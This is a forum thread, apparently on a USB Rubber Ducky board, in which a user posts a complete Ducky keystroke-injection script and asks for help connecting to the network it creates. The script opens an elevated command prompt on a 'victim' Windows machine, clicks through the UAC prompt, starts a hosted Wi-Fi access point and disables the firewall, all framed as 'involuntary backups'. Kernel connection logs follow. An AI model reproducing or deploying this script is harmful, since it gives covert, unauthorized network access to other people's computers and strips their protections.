Jump to content

Duck creates wireless network for 'involuntary backups' but I cannot connect to it!


Recommended Posts

Hello,

I have a problem with the following ducky script.

DELAY 3000
GUI r
DELAY 2000
STRING powershell Start-Process cmd -Verb runAs
DELAY 1000
ENTER
DELAY 10000
LEFTARROW
ENTER
DELAY 2000
STRING netsh wlan set hostednetwork mode=allow ssid=network key=whatever
ENTER
DELAY 2000
STRING netsh wlan start hostednetwork
ENTER
DELAY 2000
STRING netsh firewall set opmode disable
ENTER
DELAY 2000
STRING exit
ENTER

I do what Darren does in "What's Up With the Duck?":



The duck script seems to work on the target machine. The network 'network' is created. However, when I connect to 'network' from my machine and enter the password, the connection always times out.

This is what a successful connection from me to my AP looks like:

[68488.324824] wlan0: authenticate with b1:cd:00:12:a7:88
[68488.332390] wlan0: send auth to b1:cd:00:12:a7:88 (try 1/3)
[68488.334924] wlan0: authenticated
[68488.338097] wlan0: associate with b1:cd:00:12:a7:88 (try 1/3)
[68488.341976] wlan0: RX AssocResp from b1:cd:00:12:a7:88 (capab=0x411 status=0 aid=2)
[68488.352677] wlan0: associated
[68488.352980] cfg80211: Calling CRDA for country: AL
[68488.362972] cfg80211: 2402000 KHz - 2482000 KHz @ 20000 KHz), (N/A mBi, 2000 mBm)
[68488.362978] cfg80211: Regulatory domain changed to country: AL
[68488.362979] cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
[68488.362981] cfg80211: (2402000 KHz - 2482000 KHz @ 20000 KHz), (N/A, 2000 mBm)

[...]

I disconnect deliberately:

[68529.914912] wlan0: deauthenticating from b1:cd:00:12:a7:88 by local choice (reason=3)
[68529.970614] cfg80211: All devices are disconnected, going to restore regulatory settings
[68529.970621] cfg80211: Restoring regulatory settings

Here is what happens when I connect to 'network'.

[69302.952696] wlan0: authenticate with 21:32:12:7a:40:42
[69302.968746] wlan0: send auth to 21:32:12:7a:40:42 (try 1/3)
[69302.970611] wlan0: authenticated
[69302.971105] wlan0: associate with 21:32:12:7a:40:42 (try 1/3)
[69302.981330] wlan0: RX AssocResp from 21:32:12:7a:40:42 (capab=0x431 status=0 aid=1)
[69302.992791] wlan0: associated
[69302.993017] cfg80211: Calling CRDA for country: AL
[69302.999402] cfg80211: Updating information on frequency 2412 MHz for a 20 MHz width channel with regulatory rule:
[69302.999408] cfg80211: 2402000 KHz - 2482000 KHz @ 20000 KHz), (N/A mBi, 2000 mBm)

[...]

I am deauthenticated involuntarily:

[69348.297397] wlan0: deauthenticating from 21:32:12:7a:40:42 by local choice (reason=3)
[69348.373035] cfg80211: All devices are disconnected, going to restore regulatory settings
[69348.373042] cfg80211: Restoring regulatory settings

I don't see any difference between a successful connection to my AP and an unsuccessful connection to the target machine. The target is a Windows 8 box.

Does anyone know why I cannot connect to 'network'. Thanks! Edited by michael_kent123
Link to comment
Share on other sites

Just to expand on the above.

I have used the ducky code successfully on one Windows 8 machine. The script creates a network which I connect to (with a Blackberry) and receive a 192.168.x.x address.

However, on another Windows 8 machine, the script also creates the network. Yet, whenever I try to connect to the network from my Ubuntu machine, I can never obtain a connection. I also try via the Blackberry but it also will not connect. It just times out / deauthenticates itself.

When the script runs on the second Windows machine, all looks fine. I see the commands being run and accepted in the Windows terminal.

Does anyone have any ideas? Why would it work on one Windows but not on the other?

Link to comment
Share on other sites

Perhaps I am missing something obvious.

I run the script on the target. This creates the new wireless network. On my machine, I disconnect from whatever network I am connected to. I then connect to the new wireless network created on the victim machine.

Is this correct? Thanks.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...